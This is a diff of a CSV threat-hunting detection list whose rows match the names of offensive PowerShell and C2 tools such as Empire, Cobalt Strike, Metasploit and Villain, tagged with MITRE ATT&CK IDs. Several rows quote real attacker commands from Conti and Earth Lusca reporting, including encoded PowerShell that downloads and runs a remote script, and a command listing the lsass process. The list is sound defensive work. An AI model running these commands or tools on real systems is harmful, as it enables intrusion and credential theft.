-"*PowerShdll*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","1","N/A","N/A","10","1649","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z"
+"*PowerSharpBinaries*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*PowerSharpPack.ps1*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*PowerSharpPack-master*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*PowerShdll*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","1","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z"
 "*powershell *C:\Users\Public\*.exe* forfiles.exe /p *\system32 *.exe**","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
 "*powershell *Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -property * | findstr*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -14964,7 +15132,7 @@
 "*powershell IEX (New-Object Net.WebClient).DownloadString(*) Get-NetComputer -FullData *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*powershell IEX (New-Object Net.WebClient).DownloadString*.ps1*Get-NetComputer -FullData*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*powershell Invoke-WebRequest http*.bat *","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*Powershell LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","0","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z"
+"*Powershell LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","0","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z"
 "*powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #14","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*powershell.exe -noninteractive -executionpolicy bypass ipconfig /all*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #8","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*powershell.exe -noninteractive -executionpolicy bypass ps lsass*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #11","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -14984,49 +15152,49 @@
 "*powershell_encode_stager*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
 "*powershell_management_psinject*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
 "*powershell_management_spawn*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
-"*PowerShell_PoC.zip*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*PowerShell_PoC.zip*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
 "*powershell_privesc_bypassuac_eventvwr*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
 "*powershell_privesc_sherlock*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
-"*powershell_reverse_shell.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
-"*powershell_reverse_tcp.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*powershell_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
-"*powershell_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"*powershell_reverse_shell.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*powershell_reverse_tcp.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*powershell_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"*powershell_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
 "*powershell-admin-download-execute.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z"
 "*PowershellAgentGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
 "*PowershellAmsiGenerator*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
-"*PowerShellArsenal*","offensive_tool_keyword","PowerShellArsenal","PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. etc.","T1057 - T1053 - T1050 - T1564 - T1083 - T1003","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mattifestation/PowerShellArsenal","1","1","N/A","N/A","9","827","224","2021-08-20T08:41:50Z","2014-11-16T15:20:17Z"
-"*PowerShellArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*PowerShellArsenal*","offensive_tool_keyword","PowerShellArsenal","PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. etc.","T1057 - T1053 - T1050 - T1564 - T1083 - T1003","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mattifestation/PowerShellArsenal","1","1","N/A","N/A","9","828","224","2021-08-20T08:41:50Z","2014-11-16T15:20:17Z"
+"*PowerShellArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
 "*PowershellCradleGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
 "*PowerShellEmpire*","offensive_tool_keyword","empire","PowerShell offers a multitude of offensive advantages. including full .NET access. application whitelisting. direct access to the Win32 API. the ability to assemble malicious binaries in memory. and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014. but despite the multitude of useful projects. many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://www.powershellempire.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*PowerShellExecuter.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
